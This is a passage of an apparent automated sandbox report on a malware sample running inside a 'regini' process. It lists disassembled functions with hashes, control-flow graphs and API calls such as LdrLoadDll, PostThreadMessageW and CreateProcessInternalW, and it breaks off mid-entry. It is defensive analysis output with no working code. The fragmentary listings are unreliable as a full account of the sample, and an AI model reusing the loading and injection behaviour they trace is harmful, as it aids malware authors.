                                                                                  • Instruction Fuzzy Hash: 1090022160540602D60271594404A17000A87D0241FA5C026A102C775ECA268E92B131
                                                                                  Function 02DB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                  • Instruction ID: f836c76b57dc4d13f407fd40933ae7bbce3d1c5ef7feb2f4b4d7c746028fc84c
                                                                                  • Opcode Fuzzy Hash: 650b36942388c1619922473b5caa68cca596bc3362deea03293fd9231b7c2103
                                                                                  • Instruction Fuzzy Hash: 79900221215C0142D70175694C14F07000587D0303F65C119A015C774CC9168D616521
                                                                                  Function 02DB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                  • Instruction ID: b71f70a77836ed3d36df0da601ec4dddcb62f805e71b362b978c5d6d8925dfd4
                                                                                  • Opcode Fuzzy Hash: d742198b3969a4eb0a0f35a7b4c1f4e52124c7dc7850b74093e80b722ac9e79a
                                                                                  • Instruction Fuzzy Hash: 6D90022160540142464171698844D074005ABE1211765C125A099C770D855A8D656665
                                                                                  Function 02DB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                  • Instruction ID: e31724aa89370f5ec178aa8d6caabf33122de3d8fc4692c4b6112b8df3dd89ea
                                                                                  • Opcode Fuzzy Hash: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                  • Instruction Fuzzy Hash: 4190026134540542D60171594414F070005C7E1301F65C019E106C774D861ACD527126
                                                                                  Function 02DB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                  • Instruction ID: 92e357aff0fb759145fa2ae472ba76d0f49c17b25c3250af0130b1c7d149a973
                                                                                  • Opcode Fuzzy Hash: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                  • Instruction Fuzzy Hash: 1C90023120540502D60175995408A47000587E0301F65D015A502C775EC6668D917131
                                                                                  Function 02DB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                  • Instruction ID: 2201b55b5dc446577779a53e3c29529a89055b781f2b8675dafa0114b0ab3588
                                                                                  • Opcode Fuzzy Hash: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                  • Instruction Fuzzy Hash: 8690023120548902D61171598404B4B000587D0301F69C415A442C778D86968D917121
                                                                                  Function 02DB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                  • Instruction ID: 52c25b1210c3f989b3e86a8f9445bdf027f608b8f01902210b95e8bad9dd3970
                                                                                  • Opcode Fuzzy Hash: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                  • Instruction Fuzzy Hash: 1690023120540942D60171594404F47000587E0301F65C01AA012C774D8616CD517521
                                                                                  Function 02DB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                  • Instruction ID: c5cd1b794bd7c10e573a6a9d17368cfb09a858349fd63a00c817c15cd50c31b3
                                                                                  • Opcode Fuzzy Hash: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                  • Instruction Fuzzy Hash: 4D900221246442525A46B1594404907400697E02417A5C016A141CB70C85279D56E621
                                                                                  Function 02DB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                  • Instruction ID: 0adc8368fc2c5423924803c49ed29fbf967981449dade7367c9a97926c91c0ea
                                                                                  • Opcode Fuzzy Hash: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                  • Instruction Fuzzy Hash: 6E90023120540513D61271594504B07000987D0241FA5C416A042C778D96578E52B121
                                                                                  Function 02DB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                  • Instruction ID: 0e236aa776d6c721add0c2dcf999fa85db210998c860baa00c136f647343eb3a
                                                                                  • Opcode Fuzzy Hash: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                  • Instruction Fuzzy Hash: 3590022921740102D68171595408A0B000587D1202FA5D419A001D778CC9168D696321
                                                                                  Function 02DB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                  • Instruction ID: 541b8471501b2996ca5ad8d11203fd218d40facfd89b4ac521544e35e60feee3
                                                                                  • Opcode Fuzzy Hash: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                  • Instruction Fuzzy Hash: FB90022130540103D64171595418A074005D7E1301F65D015E041C774CD9168D566222
                                                                                  Function 02DB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                  • Instruction ID: f3fc1ee3db002859638476f42366b275dc1c784c0d84cb2e5f04cdc34c48f2f2
                                                                                  • Opcode Fuzzy Hash: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                  • Instruction Fuzzy Hash: E490023160950502D60171594514B07100587D0201F75C415A042C778D87968E5175A2
                                                                                  Function 02DB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                  • Instruction ID: c7a1b97e34968cb607486bd6b8f84839d2e9b6bbfa596e265e3d07eb7415c8a1
                                                                                  • Opcode Fuzzy Hash: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                  • Instruction Fuzzy Hash: AA90022124945202D651715D4404A174005A7E0201F65C025A081C7B4D85568D557221
                                                                                  Function 00470EAB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 437 470eab-470ebb 439 470ef3-470ef9 437->439 440 470ebd 437->440 442 470efb-470efe 439->442 443 470f59 439->443 441 470ebe-470ed6 440->441 444 470ed9 441->444 445 470f00-470f24 442->445 446 470e8b-470e99 442->446 447 470f5a-470f9a call 4746e0 call 461470 call 481e30 443->447 448 470eda-470edf 444->448 445->447 451 470e9b-470eaa 446->451 452 470e6a-470e79 446->452 466 470f9c-470fab PostThreadMessageW 447->466 467 470fba-470fc0 447->467 453 470e87-470e89 448->453 454 470ee1-470ee2 448->454 451->437 451->448 457 470e21-470e42 452->457 458 470e1e-470e1f 452->458 453->444 453->446 454->439 460 470e44-470e45 457->460 461 470e53-470e61 457->461 458->457 460->441 464 470e47-470e51 460->464 461->452 464->461 466->467 468 470fad-470fb7 466->468 468->467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 0-962170130
                                                                                  • Opcode ID: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                                  • Instruction ID: fc59755509782bf9c6bbab87adbf2b14663f8375936eba9899550b7518fbe263
                                                                                  • Opcode Fuzzy Hash: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                                  • Instruction Fuzzy Hash: C5412371407395FFC7129F748C819EFBF68EE02764718895EE9449B352E2288907CB85
                                                                                  Function 00470EE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 469 470ee6-470ef1 470 470ef3-470ef9 469->470 471 470f5a-470f9a call 4746e0 call 461470 call 481e30 469->471 472 470efb-470efe 470->472 473 470f59 470->473 498 470f9c-470fab PostThreadMessageW 471->498 499 470fba-470fc0 471->499 475 470f00-470f24 472->475 476 470e8b-470e99 472->476 473->471 475->471 479 470e9b-470eaa 476->479 480 470e6a-470e79 476->480 483 470eab-470ebb 479->483 484 470eda-470edf 479->484 488 470e21-470e42 480->488 489 470e1e-470e1f 480->489 483->470 492 470ebd 483->492 490 470e87-470e89 484->490 491 470ee1-470ee2 484->491 494 470e44-470e45 488->494 495 470e53-470e61 488->495 489->488 490->476 496 470ed9 490->496 491->470 497 470ebe-470ed6 492->497 494->497 500 470e47-470e51 494->500 495->480 496->484 497->496 498->499 501 470fad-470fb7 498->501 500->495 501->499
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 00470FA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                                  • Instruction ID: 853ab2f343b14b92cf6d757d6452b5ef2888b20aca811e2fc2c5acfd1011bf8c
                                                                                  • Opcode Fuzzy Hash: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                                  • Instruction Fuzzy Hash: A7115076D03214BA97216AA08C429FFB73CEA427A4B108166FA18E7201E66C8D034BE5
                                                                                  Function 00470F30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 502 470f30-470f62 call 48b880 call 48c290 507 470f68-470f9a call 461470 call 481e30 502->507 508 470f63 call 4746e0 502->508 513 470f9c-470fab PostThreadMessageW 507->513 514 470fba-470fc0 507->514 508->507 513->514 515 470fad-470fb7 513->515 515->514
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 00470FA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 8077691329809588e460174acb943b2c54cecef21bc24317baeded8d31bc4bcc
                                                                                  • Instruction ID: 22871f9c5f55576d9fde3f11fe166702731866422777ca6255a833daacfbe9ae
                                                                                  • Opcode Fuzzy Hash: 8077691329809588e460174acb943b2c54cecef21bc24317baeded8d31bc4bcc
                                                                                  • Instruction Fuzzy Hash: 750184B1D0121C7AEB11BAE58C82DEFBB7CEF41794F048059FA48A7241D6785E064BB5
                                                                                  Function 0047F6EA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                                  • Instruction ID: 45156c42babda01769eec07e3e3993afc31ee041db43c5fb684071ce52a966d3
                                                                                  • Opcode Fuzzy Hash: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                                  • Instruction Fuzzy Hash: D7414475A006099FDB10DF99D8809EFB7B9FF88314F10856AE909EB310D775AE45CBA0
                                                                                  Function 0047F6F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                                  • Instruction ID: ac6cc4c95f8142371abbe82b4e96dd9c3b04c8eb70f4586730afbe11a4cdf0f7
                                                                                  • Opcode Fuzzy Hash: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                                  • Instruction Fuzzy Hash: 7E3130B5A0060AAFDB14DFD8D8809EFB7B9FF88304B10855AE505EB214D775EE05CBA4
                                                                                  Function 00489A60 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00489A9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: 14G
                                                                                  • API String ID: 3298025750-2306503025
                                                                                  • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction ID: 6ed8852c843ea5ae9b43187cdd817a6f60b1f81c09e8f1643be2342e60062821
                                                                                  • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction Fuzzy Hash: CDE065B6200204BBD614EE5ADC42FAB77ACEF88714F00440AFA0CA7242D774B9108BB9
                                                                                  Function 00483C70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00483D4B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: wininet.dll
                                                                                  • API String ID: 3472027048-3354682871
                                                                                  • Opcode ID: a3f7fd6795f6ed47afbf2d4f170438bb2dc12e95c58c59c2aeb1da83c2f6be33
                                                                                  • Instruction ID: 71bd19ca9e995b71b0bb6e8650d6bc739d399461fa3a46021e5c632ac2e2b377
                                                                                  • Opcode Fuzzy Hash: a3f7fd6795f6ed47afbf2d4f170438bb2dc12e95c58c59c2aeb1da83c2f6be33
                                                                                  • Instruction Fuzzy Hash: D831B2B1600305BBD714EFA4C881FEBB7B8EB88B04F10851DF51D6B241C7746A45CBA9
                                                                                  Function 00474760 Relevance: 1.6, APIs: 1, Instructions: 117libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00474752
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: f71bd5ac56482ca21d55992914d5c7dcc397f6ad8c6a319e609c08bbe8bab96a
                                                                                  • Instruction ID: 507765dcd66b659068a697eda5539be9c003e4cf5308774bd7566ed545eba272
                                                                                  • Opcode Fuzzy Hash: f71bd5ac56482ca21d55992914d5c7dcc397f6ad8c6a319e609c08bbe8bab96a
                                                                                  • Instruction Fuzzy Hash: 2931CFB560410AFAC714DBB49C42FDB7B69DB82704F10865FE4199B142D720D50687E5
                                                                                  Function 004746E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00474752
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction ID: 2c3ebbfb7b536aa71fa255cbc84b4938d0b33b363c263637b9f091c47845b349
                                                                                  • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction Fuzzy Hash: 210152B6D0010DA7DB10EAE1DC82FEEB3789B54308F00859AE91C97241F674EB14C755
                                                                                  Function 00489AF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,004784DE,00000010,?,?,?,00000044,?,00000010,004784DE,?,?,?), ref: 00489B50
                                                                                  Memory Dump Source
